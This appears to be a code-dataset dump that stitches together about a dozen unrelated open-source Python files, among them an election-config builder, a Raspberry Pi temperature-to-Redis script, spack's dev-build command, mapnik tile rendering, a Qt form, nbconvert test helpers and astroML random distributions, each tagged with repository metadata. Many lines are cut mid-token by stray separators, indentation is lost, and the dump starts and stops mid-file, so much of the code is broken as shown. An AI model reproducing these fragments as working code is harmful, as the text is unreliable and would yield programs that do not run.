voting_scheme = [voting_scheme_yes_no, voting_scheme_score]
for option_id, proposition in enumerate(ballot.propositions, start=1):
proponents = [s.name for s in proposition.supporters]
option = vvvote_schema.Option(
optionID=option_id,
proponents=proponents,
optionTitle=proposition.title,
optionDesc=proposition.content,
reasons=proposition.motivation,
)
options.append(option)
if len(ballot.propositions) == 1:
question_wording = ballot.propositions[0].title
else:
question_wording = ballot.name
question = vvvote_schema.Question(
questionWording=question_wording, questionID=question_id, scheme=voting_scheme, options=options,
findWinner=['yesNo', 'score', 'random']
)
return question
def voting_phase_to_vvvote_election_config(module_config, phase) -> vvvote_schema.ElectionConfig:
questions = [ballot_to_vvvote_question(b, ii) for ii, b in enumerate(phase.ballots, start=1)]
end = phase.target
start = end - datetime.timedelta(days=14)
auth_data = vvvote_schema.OAuthConfig(
eligible=module_config["must_be_eligible"],
external_voting=True,
verified=module_config["must_be_verified"],
nested_groups=[module_config["required_role"]],
serverId=module_config["auth_server_id"],
RegistrationStartDate=start,
RegistrationEndDate=end,
VotingStart=start,
VotingEnd=end,
)
config = vvvote_schema.ElectionConfig(
electionId=str(uuid4()),
electionTitle=phase.title or phase.name or phase.phase_type.name,
tally=vvvote_schema.Tally.CONFIGURABLE,
auth=vvvote_schema.Auth.OAUTH,
authData=auth_data,
questions=questions
)
return config
|
Choko256/pysfmlengine
|
util.py
|
Python
|
gpl-3.0
| 528
| 0.035985
|
#-*- coding:utf-8 -*-
class EventThrower:
de
|
f __init__(self):
self.events = {}
def on(self, name, callback, priority=99):
if name in self.events:
self.events[name].append({
'fct': callback,
'priority': priority
})
self.events[name] = sorted(self.events[name], key=lambda x: x['priority'], reverse=True)
def off(self, name):
if name in self.events:
del self.events[name]
def trigger(self, name, **kwargs):
if name in self.events:
for cb in self.events[name]:
cb['fct'
|
](self, **kwargs)
|
tommybobbins/velpi
|
utilities/redis_sensor.py
|
Python
|
gpl-2.0
| 2,563
| 0.017948
|
#!/usr/bin/python
# Modified 30-Oct-2013
# tng@chegwin.org
# Retrieve:
# 1: current temperature from a TMP102 sensor
# 2: Send to redis
import sys,time
from sys import path
import datetime
from time import sleep
import re
import redis
time_to_live = 3600
###### IMPORTANT #############
###### How close to comfortable temperature is this sensor
###### determines how much weighting this sensor
###### if used at an extreme point in the house (say cellar), set to 1
###### if used centrally (living room), set to 3 or 4
multiplier = 1
#import crankers
sys.path.append("/usr/local/lib/python2.7/site-packages/Adafruit-Raspberry-Pi-Python-Code/Adafruit_I2C/")
from Adafruit_I2C import Adafruit_I2C
redthis = redis.StrictRedis(host='433host',port=6379, db=0, socket_timeout=3)
room_location="cellar"
sensor_name="temperature/"+room_location+"/sensor"
mult_name="temperature/"+room_location+"/multiplier"
#print ("Sensor name is %s" % sensor_name)
#print ("Multiplier name is %s" % mult_name)
clas
|
s Tmp102:
i2c = None
# Constructor
def __init__(self, address=0x48, mode=1, debug=False):
self.i2c = Adafruit_I2C(address, debug=debug)
self.address = address
self.debug = debug
# Make sure the specified mode is in the appropriate range
if ((mode < 0) | (mode > 3)):
if (self.debug):
print "Invalid Mode: Using STANDARD by default"
self.m
|
ode = self.__BMP085_STANDARD
else:
self.mode = mode
def readRawTemp(self):
"Reads the raw (uncompensated) temperature from the sensor"
self.i2c.write8(0, 0x00) # Set temp reading mode
raw = self.i2c.readList(0,2)
val = raw[0] << 4;
val |= raw[1] >> 4;
return val
def readTemperature(self):
"Gets the compensated temperature in degrees celcius"
RawBytes = self.readRawTemp() #get the temp from readRawTemp (above)
temp = float(float(RawBytes) * 0.0625) #this is the conversion value from the data sheet.
if (self.debug):
print "DBG: Raw Temp: 0x%04X (%d)" % (RawBytes & 0xFFFF, RawBytes)
print "DBG: Calibrated temperature = %f C" % temp
return RawBytes,temp
while True:
try:
mytemp = Tmp102(address=0x48)
floattemp = mytemp.readTemperature()[1]
# print ("Float temp = %f" % floattemp)
redthis.set(sensor_name,floattemp)
redthis.set(mult_name,multiplier)
redthis.expire(sensor_name,time_to_live)
redthis.expire(mult_name,time_to_live)
except:
print ("Unable to retrieve temperature")
time.sleep(120)
|
bnookala/fsm
|
example.py
|
Python
|
mit
| 448
| 0.015625
|
#/usr/bin
|
/env python
from fsm import Machine
states = ["q1", "q2", "q3"]
alphabet = ["0","1"]
transitions = {
"q1": {"0": "q1", "1": "q2"},
"q2": {"0": "q3", "1": "q2"},
"q3": {"0": "q2", "1": "q2"},
}
start = "q1"
end = ["q2"]
machine = Machine.from_arguments(states, alphabet, transitions, start, end)
machine.
|
run(123) # fail
machine.run("") # fail
machine.run("1") # pass
machine.run("11") # pass
machine.run("0100101") # pass
|
polymorphm/scgi-wsgi-daemon
|
lib_scgi_wsgi_daemon__2011_08_06/daemonize.py
|
Python
|
gpl-3.0
| 1,222
| 0.003273
|
# -*- mode: python; coding: utf-8 -*-
#
# Copyright 2011 Andrej A Antonov <polymorphm@qmail.com>
#
# This program is free software:
|
you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at
|
your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import
assert unicode is not str
def daemonize():
from os import (
EX_OK,
devnull,
O_RDWR,
fork,
open as os_open,
close as os_close,
)
if fork():
exit(EX_OK)
for fd in range(0, 3):
try:
os_close(fd)
except OSError:
pass
os_open(devnull, O_RDWR)
os_open(devnull, O_RDWR)
os_open(devnull, O_RDWR)
|
rousseab/pymatgen
|
pymatgen/io/vaspio/vasp_output.py
|
Python
|
mit
| 539
| 0.003711
|
# coding: utf-8
#!/usr/bin/env python
from __future__ import div
|
ision, unicode_literals
"""
#TODO: Write module doc.
"""
__author__ = 'Shyue Ping Ong'
__copyright__ = 'Copyright 2013, The Materials Virtual Lab'
__version__ = '0.1'
__maintainer__ = 'Shyue Ping Ong'
__email_
|
_ = 'ongsp@ucsd.edu'
__date__ = '8/1/15'
import warnings
warnings.warn("pymatgen.io.vaspio.vasp_output has been moved "
"pymatgen.io.vasp.outputs "
"This stub will be removed in pymatgen 4.0.")
from pymatgen.io.vasp.outputs import *
|
rspavel/spack
|
lib/spack/spack/cmd/dev_build.py
|
Python
|
lgpl-2.1
| 3,928
| 0
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import sys
import os
import llnl.util.tty as tty
import spack.config
import spack.cmd
import spack.cmd.common.arguments as arguments
import spack.repo
from spack.stage import DIYStage
description = "developer build: build from code in current working directory"
section = "build"
level = "long"
def setup_parser(subparser):
arguments.add_common_arguments(subparser, ['jobs'])
subparser.add_argument(
'-d', '--source-path', dest='source_path', default=None,
help="path to source directory. defaults to the current directory")
subparser.add_argument(
'-i', '--ignore-dependencies', action='store_true', dest='ignore_deps',
help="don't try to install dependencies of requested packages")
arguments.add_common_arguments(subparser, ['no_checksum'])
subparser.add_argument(
'--keep-prefix', action='store_true',
help="do not remove the install prefix if installation fails")
subparser.add_argument(
'--skip-patch', action='store_true',
help="skip patching for the developer build")
subparser.add_argument(
'-q', '--quiet', action='store_true', dest='quiet',
help="do not display verbose build output while installing")
subparser.add_argument(
'--drop-in', type=str, dest='shell', default=None,
help="drop into a build environment in a new shell, e.g. bash, zsh")
arguments.add_common_arguments(subparser, ['spec'])
stop_group = subparser.add_mutually_exclusive_group()
stop_group.add_argument(
'-b', '--before', type=str, dest='before', default=None,
help="phase to stop before when installing (default None)")
stop_group.add_argument(
'-u', '--until', type=str, dest='until', default=None,
help="phase to stop after when installing (default None)")
cd_group = subparser.add_mutually_exclusive_group()
arguments.add_common_arguments(cd_group, ['clean', 'dirty'])
def dev_build(self, args):
if not args.spec:
tty.die("spack dev-build requires a package spec argument.")
specs = spack.cmd.parse_specs(args.spec)
if len(specs) > 1:
tty.die("spack dev-build only takes one spec.")
spec = specs[0]
if not spack.repo.path.exists
|
(spec.name):
tty.die("No package for '{0}' was found.".format(spec.name),
" Use `spack create` to create a new package")
if not spec.versions.concrete:
tty.die(
"spack dev-build spec must have a single, concrete version. "
"Did you forget a package version number?")
spec.concretize()
package = spack.repo.get(spec)
if package.installed:
tty.error("Already installed in %s" % package.prefix)
tty.msg("Uninstall o
|
r try adding a version suffix for this dev build.")
sys.exit(1)
source_path = args.source_path
if source_path is None:
source_path = os.getcwd()
source_path = os.path.abspath(source_path)
# Forces the build to run out of the current directory.
package.stage = DIYStage(source_path)
# disable checksumming if requested
if args.no_checksum:
spack.config.set('config:checksum', False, scope='command_line')
package.do_install(
make_jobs=args.jobs,
keep_prefix=args.keep_prefix,
install_deps=not args.ignore_deps,
verbose=not args.quiet,
keep_stage=True, # don't remove source dir for dev build.
dirty=args.dirty,
stop_before=args.before,
stop_at=args.until)
# drop into the build environment of the package?
if args.shell is not None:
spack.build_environment.setup_package(package, dirty=False)
os.execvp(args.shell, [args.shell])
|
jharris2268/osmquadtreeutils
|
osmquadtreeutils/rendertiles.py
|
Python
|
gpl-3.0
| 3,227
| 0.047412
|
import mapnik
import subprocess,PIL.Image,cStringIO as StringIO
import time,sys,os
ew = 20037508.3428
tz = 8
def make_mapnik(fn, tabpp = None, scale=None, srs=None, mp=None, avoidEdges=False, abspath=True):
cc=[l for l in subprocess.check_output(['carto',fn]).split("\n") if not l.startswith('[millstone')]
if scale!=None:
for i,c in enumerate(cc):
if 'ScaleDenominator' in c:
sd=c.strip()[21:-22]
nsd=str(int(sd)*scale)
#print i,sd,"=>",nsd,
c=c.replace(sd, nsd)
#print c
cc[i]=c
bsp=''
if abspath:
a,b=os.path.split(fn)
if a:
bsp=a
#for i,c in enumerate(cc):
# if 'file' in c:
# if 'file=' in c:
# cc[i] = c.replace('file="','file="'+a+'/')
# elif 'name="file"><![CDATA[' in c:
# cc[i] = c.replace('CDATA[','CDATA['+a+'/')
|
if avoidEdges:
for i,c in enumerate(cc):
if '<ShieldSymbolizer size' in c:
cs = c.replace("ShieldSymbolizer size", "ShieldSymbolizer avo
|
id-edges=\"true\" size")
cc[i]=cs
if tabpp != None:
cc=[l.replace("planet_osm",tabpp) for l in cc]
#cc2=[c.replace("clip=\"false","clip=\"true") for c in cc]
#cc3=[c.replace("file=\"symbols", "file=\""+root+"/symbols") for c in cc2]
#cc4=[c.replace("CDATA[data", "CDATA["+root+"/data") for c in cc3]
if mp==None:
mp = mapnik.Map(256*tz,256*tz)
mapnik.load_map_from_string(mp,"\n".join(cc),False,bsp)
if srs!=None:
mp.srs=srs
#mp.buffer_size=128
return mp
def tilebound(z,x,y,tzp):
zz = 1<<(z-1)
ss = ew/zz * tzp
xx = x / tzp
yy = y / tzp
bx = mapnik.Box2d(-ew + ss*xx, ew-ss*(yy+1), -ew+ss*(xx+1), ew-ss*yy)
mm = "%d %d %d {%d %d %d %f} => %s" % (z,x,y,zz,xx,yy,ss,bx)
return xx,yy,mm,bx
def render_im(mp,bx,width,height=None, scale_factor=1.0, buffer_size=256):
if height==None:
height=width
mp.resize(width,height)
mp.zoom_to_box(bx)
mp.buffer_size = buffer_size
im=mapnik.Image(mp.width,mp.height)
mapnik.render(mp,im, scale_factor)
return PIL.Image.frombytes('RGBA',(mp.width,mp.height),im.tostring())
def render_tile(mp,z,x,y):
st=time.time()
tzp = 1
if z==13: tzp=2
if z==14: tzp=4
if z>=15: tzp=8
#tzp = tz if z>10 else 1
xx,yy,mm,bx=tilebound(z,x,y,tzp)
print mm,
sys.stdout.flush()
pim = render_im(mp,bx,tzp*256)
print "%-8.1fs" % (time.time()-st,)
return iter_subtiles(pim,xx,yy,z,tzp)
def iter_subtiles(pim, xx,yy,z,tzp,ts=256):
for i in xrange(tzp):
for j in xrange(tzp):
xp = xx*tzp+i
yp = yy*tzp+j
pp = pim.crop([i*ts,j*ts,(i+1)*ts,(j+1)*ts])
#return pim.tostring('png')
ss=StringIO.StringIO()
pp.save(ss,format='PNG')
yield (z,xp,yp),ss.getvalue()
|
fbradyirl/home-assistant
|
homeassistant/components/simplisafe/const.py
|
Python
|
apache-2.0
| 203
| 0
|
"""Define constants for the SimpliSafe component."""
from datetime import timedelta
DOMAIN = "simplisafe"
DATA_CLIENT = "client"
DEFAULT_SCAN_INTERVAL =
|
timedelta(seconds=30)
TOPIC_UPDATE = "u
|
pdate"
|
JeffHoogland/mtg-totals
|
Qt/ui_mainWindow.py
|
Python
|
bsd-3-clause
| 13,255
| 0.001283
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'mainWindow.ui'
#
# Created: Fri Sep 25 14:24:01 2015
# by: pyside-uic 0.2.15 running on PySide 1.2.1
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore, QtGui
class Ui_mainWindow(object):
def setupUi(self, mainWindow):
mainWindow.setObjectName("mainWindow")
mainWindow.resize(474, 557)
self.centralwidget = QtGui.QWidget(mainWindow)
self.centralwidget.setObjectName("centralwidget")
self.verticalLayout_13 = QtGui.QVBoxLayout(self.centralwidget)
self.verticalLayout_13.setObjectName("verticalLayout_13")
self.frame_3 = QtGui.QFrame(self.centralwidget)
self.frame_3.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame_3.setFrameShadow(QtGui.QFrame.Raised)
self.frame_3.setObjectName("frame_3")
self.horizontalLayout = QtGui.QHBoxLayout(self.frame_3)
self.horizontalLayout.setObjectName("horizontalLayout")
self.frame_2 = QtGui.QFrame(self.frame_3)
self.frame_2.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame_2.setFrameShadow(QtGui.QFrame.Raised)
self.frame_2.setObjectName("frame_2")
self.verticalLayout_7 = QtGui.QVBoxLayout(self.frame_2)
self.verticalLayout_7.setObjectName("verticalLayout_7")
self.p1Label = QtGui.QLabel(self.frame_2)
self.p1Label.setObjectName("p1Label")
self.verticalLayout_7.addWidget(self.p1Label)
self.frame = QtGui.QFrame(self.frame_2)
self.frame.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame.setFrameShadow(QtGui.QFrame.Raised)
self.frame.setObjectName("frame")
self.verticalLayout_2 = QtGui.QVBoxLayout(self.frame)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.label_2 = QtGui.QLabel(self.frame)
self.label_2.setObjectName("label_2")
self.verticalLayout_2.addWidget(self.label_2)
self.p1Name = QtGui.QLineEdit(self.frame)
self.p1Name.setObjectName("p1Name")
self.verticalLayout_2.addWidget(self.p1Name)
self.verticalLayout_7.addWidget(self.frame)
self.frame_4 = QtGui.QFrame(self.frame_2)
self.frame_4.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame_4.setFrameShadow(QtGui.QFrame.Raised)
self.frame_4.setObjectName("frame_4")
self.verticalLayout_3 = QtGui.QVBoxLayout(self.frame_4)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.label_3 = QtGui.QLabel(self.frame_4)
self.label_3.setObjectName("label_3")
self.verticalLayout_3.addWidget(self.label_3)
self.p1Deck = QtGui.QLineEdit(self.frame_4
|
)
self.p1Deck.setObjectName("p1Deck")
self.verticalLayout_3.addWidget(self.p1Deck)
self.verticalLayout_7.addWidget(self.frame_4)
self.frame_14 = QtGui.QFrame(self.frame_2)
self.frame_14.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame_14.setFrameShadow(QtGui.QFrame.Raised)
self.frame_14.setObjectName("frame_14")
self.verticalLayout_8 = QtGui.QVBoxLayout(self.frame_14)
s
|
elf.verticalLayout_8.setObjectName("verticalLayout_8")
self.label_11 = QtGui.QLabel(self.frame_14)
self.label_11.setObjectName("label_11")
self.verticalLayout_8.addWidget(self.label_11)
self.p1Life = QtGui.QSpinBox(self.frame_14)
self.p1Life.setMaximum(10000)
self.p1Life.setProperty("value", 20)
self.p1Life.setObjectName("p1Life")
self.verticalLayout_8.addWidget(self.p1Life)
self.verticalLayout_7.addWidget(self.frame_14)
self.frame_16 = QtGui.QFrame(self.frame_2)
self.frame_16.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame_16.setFrameShadow(QtGui.QFrame.Raised)
self.frame_16.setObjectName("frame_16")
self.verticalLayout_10 = QtGui.QVBoxLayout(self.frame_16)
self.verticalLayout_10.setObjectName("verticalLayout_10")
self.label_13 = QtGui.QLabel(self.frame_16)
self.label_13.setObjectName("label_13")
self.verticalLayout_10.addWidget(self.label_13)
self.p1Infect = QtGui.QSpinBox(self.frame_16)
self.p1Infect.setMaximum(10000)
self.p1Infect.setObjectName("p1Infect")
self.verticalLayout_10.addWidget(self.p1Infect)
self.verticalLayout_7.addWidget(self.frame_16)
self.frame_11 = QtGui.QFrame(self.frame_2)
self.frame_11.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame_11.setFrameShadow(QtGui.QFrame.Raised)
self.frame_11.setObjectName("frame_11")
self.verticalLayout = QtGui.QVBoxLayout(self.frame_11)
self.verticalLayout.setObjectName("verticalLayout")
self.label_9 = QtGui.QLabel(self.frame_11)
self.label_9.setObjectName("label_9")
self.verticalLayout.addWidget(self.label_9)
self.p1GameWins = QtGui.QSpinBox(self.frame_11)
self.p1GameWins.setMaximum(1000)
self.p1GameWins.setObjectName("p1GameWins")
self.verticalLayout.addWidget(self.p1GameWins)
self.verticalLayout_7.addWidget(self.frame_11)
self.horizontalLayout.addWidget(self.frame_2)
self.frame_5 = QtGui.QFrame(self.frame_3)
self.frame_5.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame_5.setFrameShadow(QtGui.QFrame.Raised)
self.frame_5.setObjectName("frame_5")
self.verticalLayout_9 = QtGui.QVBoxLayout(self.frame_5)
self.verticalLayout_9.setObjectName("verticalLayout_9")
self.p2Label = QtGui.QLabel(self.frame_5)
self.p2Label.setObjectName("p2Label")
self.verticalLayout_9.addWidget(self.p2Label)
self.frame_6 = QtGui.QFrame(self.frame_5)
self.frame_6.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame_6.setFrameShadow(QtGui.QFrame.Raised)
self.frame_6.setObjectName("frame_6")
self.verticalLayout_4 = QtGui.QVBoxLayout(self.frame_6)
self.verticalLayout_4.setObjectName("verticalLayout_4")
self.label_6 = QtGui.QLabel(self.frame_6)
self.label_6.setObjectName("label_6")
self.verticalLayout_4.addWidget(self.label_6)
self.p2Name = QtGui.QLineEdit(self.frame_6)
self.p2Name.setObjectName("p2Name")
self.verticalLayout_4.addWidget(self.p2Name)
self.verticalLayout_9.addWidget(self.frame_6)
self.frame_7 = QtGui.QFrame(self.frame_5)
self.frame_7.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame_7.setFrameShadow(QtGui.QFrame.Raised)
self.frame_7.setObjectName("frame_7")
self.verticalLayout_5 = QtGui.QVBoxLayout(self.frame_7)
self.verticalLayout_5.setObjectName("verticalLayout_5")
self.label_7 = QtGui.QLabel(self.frame_7)
self.label_7.setObjectName("label_7")
self.verticalLayout_5.addWidget(self.label_7)
self.p2Deck = QtGui.QLineEdit(self.frame_7)
self.p2Deck.setObjectName("p2Deck")
self.verticalLayout_5.addWidget(self.p2Deck)
self.verticalLayout_9.addWidget(self.frame_7)
self.frame_15 = QtGui.QFrame(self.frame_5)
self.frame_15.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame_15.setFrameShadow(QtGui.QFrame.Raised)
self.frame_15.setObjectName("frame_15")
self.verticalLayout_11 = QtGui.QVBoxLayout(self.frame_15)
self.verticalLayout_11.setObjectName("verticalLayout_11")
self.label_12 = QtGui.QLabel(self.frame_15)
self.label_12.setObjectName("label_12")
self.verticalLayout_11.addWidget(self.label_12)
self.p2Life = QtGui.QSpinBox(self.frame_15)
self.p2Life.setMaximum(10000)
self.p2Life.setProperty("value", 20)
self.p2Life.setObjectName("p2Life")
self.verticalLayout_11.addWidget(self.p2Life)
self.verticalLayout_9.addWidget(self.frame_15)
self.frame_17 = QtGui.QFrame(self.frame_5)
self.frame_17.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame_17.setFrameShadow(QtGui.QFrame.Raised)
self.frame_17.setObjectName("frame_17")
self.verticalLayout_12 = QtGui.QVBox
|
unnikrishnankgs/va
|
venv/lib/python3.5/site-packages/nbconvert/tests/base.py
|
Python
|
bsd-2-clause
| 5,773
| 0.003811
|
"""Base test class for nbconvert"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
import io
import os
import glob
import shlex
import shutil
import sys
import unittest
import nbconvert
from subprocess import Popen, PIPE
import nose.tools as nt
from nbformat import v4, write
from testpath.tempdir import TemporaryWorkingDirectory
from ipython_genutils.py3compat import string_types, bytes_to_str
class TestsBase(unittest.TestCase):
"""Base tests class. Contains useful fuzzy comparison and nbconvert
functions."""
def fuzzy_compare(self, a, b, newlines_are_spaces=True, tabs_are_spaces=True,
fuzzy_spacing=True, ignore_spaces=False,
ignore_newlines=False, case_sensitive=False, leave_padding=False):
"""
Performs a fuzzy comparison of two strings. A fuzzy comparison is a
comparison that ignores insignificant differences in the two comparands.
The significance of certain differences can be specified via the keyword
parameters of this method.
"""
if not leave_padding:
a = a.strip()
b = b.strip()
if ignore_newlines:
a = a.replace('\n', '')
b = b.replace('\n', '')
if newlines_are_spaces:
a = a.replace('\n', ' ')
b = b.replace('\n', ' ')
if tabs_are_spaces:
a = a.replace('\t', ' ')
b = b.replace('\t', ' ')
if ignore_spaces:
a = a.replace(' ', '')
b = b.replace(' ', '')
if fuzzy_spacing:
a = self.recursive_replace(a, ' ', ' ')
b = self.recursive_replace(b, ' ', ' ')
if not case_sensitive:
a = a.lower()
b = b.lower()
self.assertEqual(a, b)
def recursive_replace(self, text, search, replacement):
"""
Performs a recursive replacement operation. Replaces all instances
of a search string in a text string with a replacement string until
the search string no longer exists. Recursion is needed because the
replacement string may generate additional search strings.
For example:
Replace "ii" with "i" in the string "Hiiii" yields "Hii"
Another replacement cds "Hi" (the desired output)
Parameters
----------
text : string
Text to replace in.
search : string
String to search for within "text"
replacement : string
String to replace "search" with
"""
while search in text:
text = text.replace(search, replacement)
return text
def create_temp_cwd(self, copy_filenames=None):
temp_dir = TemporaryWorkingDirectory()
#Copy the files if requested.
if copy_filenames is not None:
self.copy_files_to(copy_filenames, dest=temp_dir.name)
#Return directory handler
return temp_dir
def create_empty_notebook(self, path):
nb = v4.new_notebook()
with io.open(path, 'w', encoding='utf-8') as f:
write(nb, f, 4)
def copy_files_to(self, copy_filenames, dest='.'):
"Copy test files into the destination directory"
if not os.path.isdir(dest):
os.makedirs(dest)
files_path = self._get_files_path()
for pattern in copy_filenames:
files = glob.glob(os.path.join(files_path, pattern))
assert files
for match in files:
shutil.copyfile(match, os.path.join(dest, os.path.basename(match)))
def _get_files_path(self):
#Get the relative path to this module in the IPython directory.
names = self.__module__.split('.')[1:-1]
names.append('files')
#Build a path using the nbconvert directory and the relative path we just
#found.
path = os.path.dirname(nbconvert.__file__)
return os.path.join(path, *names)
def nbconvert(self, parameters, ignore_return_code=False, stdin=None):
"""
Run nbconvert as a shell command, listening for both Errors and
non-zero return codes. Returns the tuple (stdout, stderr) of
output produced during the nbconvert run.
Parameters
----------
parameters : str, list(str)
List of parameters to pass to IPython.
ignore_return_code : optional bool (default False)
Throw an OSError if the return code
"""
if isinsta
|
nce(parameters, string_types):
parameters = shlex.split(parameters)
cmd = [sys.executable, '-m', 'nbconvert'] + parameters
p = Popen(cmd, stdout=PIPE, stderr=PIPE, stdin=PIPE)
stdout, stderr = p.communicate(i
|
nput=stdin)
if not (p.returncode == 0 or ignore_return_code):
raise OSError(bytes_to_str(stderr))
return stdout.decode('utf8', 'replace'), stderr.decode('utf8', 'replace')
def assert_big_text_equal(a, b, chunk_size=80):
"""assert that large strings are equal
Zooms in on first chunk that differs,
to give better info than vanilla assertEqual for large text blobs.
"""
for i in range(0, len(a), chunk_size):
chunk_a = a[i:i + chunk_size]
chunk_b = b[i:i + chunk_size]
nt.assert_equal(chunk_a, chunk_b, "[offset: %i]\n%r != \n%r" % (
i, chunk_a, chunk_b))
if len(a) > len(b):
nt.fail("Length doesn't match (%i > %i). Extra text:\n%r" % (
len(a), len(b), a[len(b):]
))
elif len(a) < len(b):
nt.fail("Length doesn't match (%i < %i). Extra text:\n%r" % (
len(a), len(b), b[len(a):]
))
|
nhuntwalker/astroML
|
astroML/stats/random.py
|
Python
|
bsd-2-clause
| 3,890
| 0.000771
|
"""
Statistics for astronomy
"""
import numpy as np
from scipy.stats.distributions import rv_continuous
def bivariate_normal(mu=[0, 0], sigma_1=1, sigma_2=1, alpha=0,
size=None, return_cov=False):
"""Sample points from a 2D normal distribution
Parameters
----------
mu : array-like (length 2)
The mean of the distribution
sigma_1 : float
The unrotated x-axis width
sigma_2 : float
The unrotated y-axis width
alpha : float
The rotation counter-clockwise about the origin
size : tuple of ints, optional
Given a shape of, for example, ``(m,n,k)``, ``m*n*k`` samples are
generated, and packed in an `m`-by-`n`-by-`k` arrangement. Because
each sample is `N`-dimensional, the output shape is ``(m,n,k,N)``.
If no shape is specified, a single (`N`-D) sample is returned.
return_cov : boolean, optional
If True, return the computed covariance matrix.
Returns
-------
out : ndarray
The drawn samples, of shape *size*, if that was provided. If not,
the shape is ``(N,)``.
In other words, each entry ``out[i,j,...,:]`` is an N-dimensional
value drawn from the distribution.
cov : ndarray
The 2x2 covariance matrix. Returned only if return_cov == True.
Notes
-----
This function works by computing a covariance matrix from the inputs,
and calling ``np.random.multivariate_normal()``. If the covariance
matrix is available, this function can be called directly.
"""
# compute covariance matrix
sigma_xx = ((sigma_1 * np.cos(alpha)) ** 2
+ (sigma_2 * np.sin(alpha)) ** 2)
sigma_yy = ((sigma_1 * np.sin(alpha)) ** 2
+ (sigma_2 * np.cos(alpha)) ** 2)
sigma_xy = (sigma_1 ** 2 - sigma_2 ** 2) * np.sin(alpha) * np.cos(alpha)
cov = np.array([[sigma_xx, sigma_xy],
[sigma_xy, sigma_yy]])
# draw points from the distribution
x = np.random.multivariate_normal(mu, cov, size)
if return_cov:
return x, cov
else:
return x
#----------------------------------------------------------------------
# Define some new distributions based on rv_continuous
class trunc_exp_gen(rv_continuous):
"""A truncated positive exponential continuous random variable.
The probability distribution is::
p(x) ~ exp(k * x) between a and b
= 0 otherwise
The arguments are (a, b, k)
%(before_notes)s
%(example)s
"""
def _argcheck(self, a, b, k):
self._const = k / (np.exp(k * b) - np.exp(k * a))
return (a != b) and not np.isinf(k)
def _pdf(self, x, a, b, k):
pdf = self._const * np.exp(k * x)
pdf[(x < a) | (x > b)] = 0
return pdf
def _rvs(self, a, b, k):
y = np.random.random(self._size)
return (1. / k) * np.log(1 + y * k / self._const)
trunc_exp = trunc_exp_gen(name="trunc_exp", shapes='a, b, k')
class linear_gen(rv_continuous):
"""A truncated positive exponential continuous random variable.
The probability distribution is::
p(x) ~ c * x + d between a and b
= 0 otherwise
The arguments are (a, b, c). d is set by the normalization
%(before_notes)s
%(example)s
"""
def _argcheck(self, a, b, c):
return (a != b) and not np.isinf(c)
def _pdf(self, x, a, b, c):
|
d = 1. / (b - a) - 0.5 * c * (b + a)
pdf = c * x + d
pdf[(x < a) | (x > b)] = 0
return pdf
def _rvs(self, a, b, c):
mu = 0.5 * (a + b)
W = (b - a)
x0 = 1. / c / W - mu
r = np.random.random(self._size)
return -x0 + np.sqrt(2. * r / c + a * a
|
+ 2. * a * x0 + x0 * x0)
linear = linear_gen(name="linear", shapes='a, b, c')
|
ksmit799/Toontown-Source
|
toontown/minigame/RaceGameGlobals.py
|
Python
|
mit
| 1,615
| 0.003096
|
from toontown.toonbase import TTLocalizer
ValidChoices = [0,
1,
2,
3,
4]
NumberToWin = 14
InputTimeout = 20
ChanceRewards = (((1, 0), TTLocalizer.RaceGameForwardOneSpace, 0),
((1, 0), TTLocalizer.RaceGameForwardOneSpace, 0),
((1, 0), TTLocalizer.RaceGameForwardOneSpace, 0),
((2, 0), TTLocalizer.RaceGameForwardTwoSpaces, 0),
((2, 0), TTLocalizer.RaceGameForwardTwoSpaces, 0),
((2, 0), TTLocalizer.RaceGameForwardTwoSpaces, 0),
((3, 0), TTLocalizer.RaceGameForwardThreeSpaces, 0),
((3, 0), TTLocalizer.RaceGameForwardThreeSpaces, 0),
((3, 0), TTLocalizer.RaceGameForwardThreeSpaces, 0),
((0, -3), TTLocalizer.RaceGameOthersBackThree, 0),
((0, -3), TTLocalizer.RaceGameOthersBackThree, 0),
((-1, 0), TTLocalizer.RaceGameBackOneSpace, 0),
((-1, 0), TTLocalizer.RaceGameBackOneSpace, 0),
((-2, 0), TTLocalizer.RaceGameBackTwoSpaces, 0),
((-2, 0), TTLocalizer.RaceGameBackTwoSpaces, 0),
((-3, 0), TTLocalizer.RaceGameBackThreeSpaces, 0),
((-3, 0), TTLocalizer.RaceGameBackThreeSpaces, 0),
((0, 3), TTLocalizer.RaceGameOthersForwardThree, 0),
((0, 3), TTLocalizer.RaceGameOthersForwardThree, 0),
((0, 0), TTLocalizer.RaceGameJellybeans2, 2),
((0, 0), TTLocalizer.RaceGameJellybeans2, 2),
((0, 0), TTLocalizer.RaceGameJellybeans2, 2),
((0, 0), TTLocalizer.RaceGameJellybeans2, 2),
((0, 0), TTLocalizer.RaceGameJellybeans4, 4),
((0, 0), TTLocalizer.RaceGameJel
|
lybeans4, 4),
((0, 0), TTLocalizer.RaceGameJellybeans4, 4),
((0, 0), TTLocalizer.RaceGameJellybeans4, 4),
((0, 0), TTLocalizer.RaceGameJellybeans10, 10),
((0, 0), -1, 0),
((N
|
umberToWin, 0), TTLocalizer.RaceGameInstantWinner, 0))
|
Diti24/python-ivi
|
